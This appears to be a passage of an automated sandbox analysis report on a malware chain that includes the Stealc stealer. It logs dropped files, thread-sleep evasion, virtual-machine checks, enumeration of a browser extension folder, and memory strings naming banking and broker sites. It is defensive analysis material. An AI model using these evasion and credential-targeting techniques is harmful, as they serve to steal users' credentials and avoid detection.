                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\TPKOcaeSvfBbrcMznKuF.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AAKAL78BRQNYOCIR09Y.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAPI coverage: 0.0 %
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeAPI coverage: 5.3 %
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8092Thread sleep count: 1100 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8092Thread sleep time: -2201100s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8096Thread sleep count: 1102 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8096Thread sleep time: -2205102s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084Thread sleep count: 1055 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8084Thread sleep time: -2111055s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8072Thread sleep count: 101 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8072Thread sleep time: -3030000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8088Thread sleep count: 955 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8088Thread sleep time: -1910955s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8100Thread sleep count: 1107 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8100Thread sleep time: -2215107s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108Thread sleep count: 1149 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8108Thread sleep time: -2299149s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112Thread sleep count: 1152 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8112Thread sleep time: -2305152s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104Thread sleep count: 917 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8104Thread sleep time: -1834917s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3632Thread sleep time: -900000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 1748Thread sleep time: -90000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 2384Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe TID: 7664Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 7736Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 720Thread sleep count: 372 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 720Thread sleep time: -744372s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6976Thread sleep count: 364 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6976Thread sleep time: -728364s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 2028Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5724Thread sleep count: 350 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5724Thread sleep time: -700350s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 4812Thread sleep time: -210000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5428Thread sleep count: 370 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 5428Thread sleep time: -740370s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3808Thread sleep count: 390 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3808Thread sleep time: -780390s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6696Thread sleep count: 334 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 6696Thread sleep time: -668334s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3836Thread sleep count: 369 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3836Thread sleep time: -738369s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3504Thread sleep count: 371 > 30
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe TID: 3504Thread sleep time: -742371s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,17_2_0077E430
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00784910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00784910
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,17_2_0077BE70
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_007716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_007716D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0077F6B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00783EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,17_2_00783EA0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0077DA80
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_007838B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,17_2_007838B0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00784570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,17_2_00784570
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,17_2_0077ED20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0077DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0077DE10
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00771160 GetSystemInfo,ExitProcess,17_2_00771160
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cyBD74hgFSrUAP0/ypMI9rTGQDrKSl81mG0FZJNIeL
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                          Source: axplong.exe, 0000000D.00000002.3755340826.0000000001348000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.0000000001314000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2160616233.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3761965009.0000029989458000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461071670.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                          Source: svchost.exe, 00000003.00000002.3753120064.0000023C2968A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                          Source: svchost.exe, 00000023.00000002.3754396295.0000029987E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                          Source: svchost.exe, 00000003.00000002.3751892147.0000023C2964E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                          Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:l/!
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
                          Source: file.exe, 00000006.00000003.1347135703.0000000001052000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1
                          Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                          Source: axplong.exe, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3471962829.0000000000C56000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                          Source: svchost.exe, 00000003.00000002.3752518295.0000023C2967D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                          Source: 550b7cfe5f.exe, 0000002A.00000002.3473998772.0000000000E8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: svchost.exe, 00000004.00000002.3749895131.0000020504AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
                          Source: svchost.exe, 00000008.00000002.3766906774.000002205F62B000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000002.3755458328.0000000001910000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2543272887.000001E286618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: svchost.exe, 00000004.00000003.2435762552.0000020505340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wYcyBD74hgFSrUAP0/ypMI9rTGQDrKSl81mG0FZJNIeL
                          Source: svchost.exe, 00000004.00000003.2445813332.0000020505352000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                          Source: svchost.exe, 00000003.00000002.3750830465.0000023C29602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                          Source: 550b7cfe5f.exe, 0000002A.00000003.2461953595.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                          Source: file.exe, 00000006.00000002.1376876736.0000000000BEA000.00000040.00000001.01000000.00000004.sdmp, axplong.exe, 00000009.00000002.1397229219.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000A.00000002.1425116775.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3471962829.0000000000C56000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot 